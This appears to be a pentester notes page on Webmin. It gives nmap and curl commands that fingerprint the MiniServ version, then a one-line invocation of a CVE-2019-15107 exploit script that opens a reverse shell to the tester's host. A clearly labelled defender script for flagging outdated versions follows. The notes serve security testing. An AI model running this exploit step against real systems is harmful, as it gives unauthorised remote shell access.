webmin
Webmin (3.3k ⭐) is an open-source, web-based system administration interface for Linux. From the interface, we can:
- Manage packages
- Manage users
- Manage system configurations
- Manage network configurations
- ...
Port: 10000 (TCP)
Pentester Notes
- You can use nmap to check that the port is open and to fingerprint the service version
$ nmap -p 10000 IP
10000/tcp open snet-sensor-mgmt
$ nmap -p 10000 -sV IP
10000/tcp open http syn-ack MiniServ 1.890 (Webmin httpd)
- You can also use cURL to read the version from the Server response header
$ curl -s -I -k https://10.10.199.204:10000 | grep Server
Server: MiniServ/1.890
- You may be able to exploit CVE-2019-15107
$ [...] # start a reverse shell listener
$ python3 webmin_exploit.py target_ip target_port host_ip host_port
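
A defender-side follow-up to the version checks above, as an added example that is not part of the original notes: it pulls the MiniServ version out of the Server header and flags any release older than 1.930, which is assumed here (from the Webmin vendor advisory, not from this page) to be the first release with CVE-2019-15107 fixed. The function names and the sample headers are constructed for illustration.

```shell
#!/bin/sh
# Added example: banner triage for CVE-2019-15107 (not from the original page).
# Assumption: 1.930 is the first fixed Webmin release (vendor advisory).
# A banner is only a hint: it can be hidden or stale, so confirm on the host.
FIXED_KEY=1930   # 1.930 written as major followed by the three-digit minor

# Read HTTP response headers on stdin, print the MiniServ version if present.
# Real use, with the page's own curl flags:
#   curl -s -I -k https://HOST:10000 | miniserv_version
miniserv_version() {
    tr -d '\r' |
        sed -n 's/^[Ss]erver:[[:space:]]*MiniServ\/\([0-9][0-9.]*\).*/\1/p' |
        head -n 1
}

# Print "outdated", "fixed" or "unknown" for a version string such as 1.890.
classify_webmin() {
    case "$1" in
        ''|*[!0-9.]*|*.*.*|.*|*.) echo unknown; return 0 ;;
    esac
    major=${1%%.*}
    minor=${1#*.}
    # Webmin minors are three digits (1.890, 1.930). Refuse anything else
    # rather than guess how it should be ordered.
    if [ "${#minor}" -ne 3 ] || [ "${#major}" -gt 3 ]; then
        echo unknown; return 0
    fi
    # Concatenate and strip leading zeros so the value compares as decimal.
    key=$(printf '%s%s' "$major" "$minor" | sed 's/^0*//')
    if [ "${key:-0}" -lt "$FIXED_KEY" ]; then
        echo outdated
    else
        echo fixed
    fi
}

# Constructed sample headers; the Server line mirrors the output shown above.
sample_headers() {
    printf 'HTTP/1.0 200 Document follows\r\nServer: MiniServ/1.890\r\n\r\n'
}

v=$(sample_headers | miniserv_version)
echo "MiniServ ${v:-none}: $(classify_webmin "$v")"
```

An "unknown" result means the banner was missing or not in the expected format, so the host still needs a package-level version check.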